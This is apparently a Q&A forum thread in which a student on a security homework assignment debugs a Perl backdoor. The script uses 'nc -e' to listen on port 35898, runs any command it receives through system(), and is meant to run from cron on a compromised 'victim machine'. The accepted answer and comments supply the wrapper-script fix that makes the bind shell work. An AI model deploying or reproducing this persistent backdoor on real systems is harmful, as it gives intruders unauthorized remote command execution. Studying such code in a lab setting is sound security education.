# Perl script making call to itself (through nc -e) is failing. Claiming no such file/dir

Tags: perl, security, system-calls, netcat

We have been asked to set up a backdoor in a victim machine for a homework assignment. I've gained access to the machine and I want to have the following script run on a `cron`, but it's throwing an error.

I've verified that the `@ARGV` test works correctly by calling the program independently with and without the dummy `run` argument, but when I try and `netcat` into the victim machine on `port 35898` after initializing the script, the following error is all I get on connection.

**Error:** `exec /bin/vshell run failed : No such file or directory`

Obviously the program exists because the program is calling itself.

**Code:**

```
#!/usr/bin/perl -w

$| = 1;
my $prompt = '$ ';

# run is just a dummy arg
if(!@ARGV){ exec("nc -e '/bin/vshell run' -l -p 35898"); die; }

while(1){
  print $prompt;
  eval {
    local $SIG{ALRM} = sub { die 'Goodbye!\n'; };

    alarm 60;
    &syscall;
    alarm 0;
  };
  if( $@ ){ die; }
}

sub syscall{
  if( defined( $_ = <STDIN> )){
    chomp;
    system( $_ );
  }
}
```

I've been at this for a while and I could really use a nudge in the right direction. Thanks!

PS: This install of `nc` is compiled with the security hole which allows the `-e` flag and I have verified this functionality on other programs.

Answer (score 3, accepted):

"`/bin/vshell`" might exist, but "`/bin/vshell run`" doesn't exist. Apparently, `nc`'s `-e` value must be the path of a file to execute.

Create a file that contains

```
#!/bin/sh
exec /bin/vshell run
```

and pass the path to that instead.

Comment: Interesting... That's very counter-intuitive but let me give it a shot.

Comment: +1. According to http://nc110.sourceforge.net/: "Note that you can only supply -e with the name of the program, but no arguments.  If you want to launch something with an argument list, write a two-line wrapper script or just use inetd like always."

Comment: Yup. That was it. Thanks for the help!